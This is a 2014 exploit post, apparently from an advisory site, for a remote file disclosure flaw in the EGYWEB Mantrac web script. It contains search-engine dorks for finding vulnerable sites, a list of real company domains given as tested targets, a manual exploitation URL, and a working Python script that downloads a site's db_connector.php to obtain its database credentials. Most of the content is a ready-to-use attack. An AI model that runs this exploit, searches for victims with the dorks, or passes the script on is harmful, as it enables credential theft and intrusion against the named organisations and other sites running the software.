EGYWEB (Mantrac) <= Remote File Disclosure Exploit (.py)

2014.09.15
Credit: KnocKout
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: \"Created by EGYWEB\" | \"EGYWEB\" inurl:index.php?pg= | inurl:360download.php

EGYWEB (Mantrac) <= Remote File Disclosure Exploit (.py) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact (onlymail) : knockout@e-mail.com.tr [~] (.py) Exploit Coded by : B3mB4m [~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com [~] Special Thankz: 1337day.com ############################################################ Turkey Security Group 'h4x0re SECURITY' ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : EGYWEB |~Affected Version : Mantrac Script |~Software : www.egyweb.com |~RISK : Medium |~Google Keyword/Dork : "Created by EGYWEB" | "EGYWEB" inurl:index.php?pg= | inurl:360download.php |~Tested On : [L] Kali Linux \ Mozilla Firefox \ Arora \ [R) ALL example sites. ####################INFO################################ database passwords can be drawn. ### Error Line in '360download.php' ## .. .. $file_name=$_REQUEST['file_name']; download($file_name); ?> ######################################################## Example and tested on; http://www.deXltagroup.com.eg http://mantracXvostok.ru http://www.maXntracghana.com http://www.maXntracnigeria.com http://www.maXntrackenya.com http://www.maXntractanzania.com http://www.unXatrac.com http://www.iraXtrac.com http://www.irXatrac.iq http://www.uXnatrac.com http://www.manXtracvostok.com http://www.mantrXac-sl.com http://www.mantrXacuganda.com http://www.manXtracegypt.com http://www.quesXt.com.eg http://www.deltXa-ghana.com http://www.deltXa-tanzania.com http://www.pyraXmidscapital.com/eng/ ############################################################ Manual Exploitation; http://$VICTIM/360download.php?filename=[LOCAL FILE] ############################################################ =========Automatic "db_connector.php" File Disclosure Exploit ======== ##################### exploit.py in ############################## import urllib def master(): print """ ######################################################## EGYWEB <= Remote File Disclosure Vulnerability (.py) Automatic "db_connector.php" File Disclosure Exploit Researched by KnocKout Exploit Coded by B3mB4m Website: http://h4x0resec.blogspot.com / h4x0re Security ============ How to use : python exploit.py Target : http://VICTIM.com Target : http://VICTIM.com/path That's it ! Happy END ! ################################################# """ class KnocKout: def __init__(self): self.ask = raw_input("Target : ") def exploit(self): self.rename = self.ask.replace("http://", "") + ".php" try: urllib.urlretrieve(self.ask+"/360download.php?file_name=classes/db_connector.php", self.rename) print "Finish ! Config --> %s " % (self.rename) except: print "This website have a security sorry ! "; if __name__ == '__main__': master() op = KnocKout() op.exploit()

References:

http://Cyber-Warrior.Org
http://h4x0resec.blogspot.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top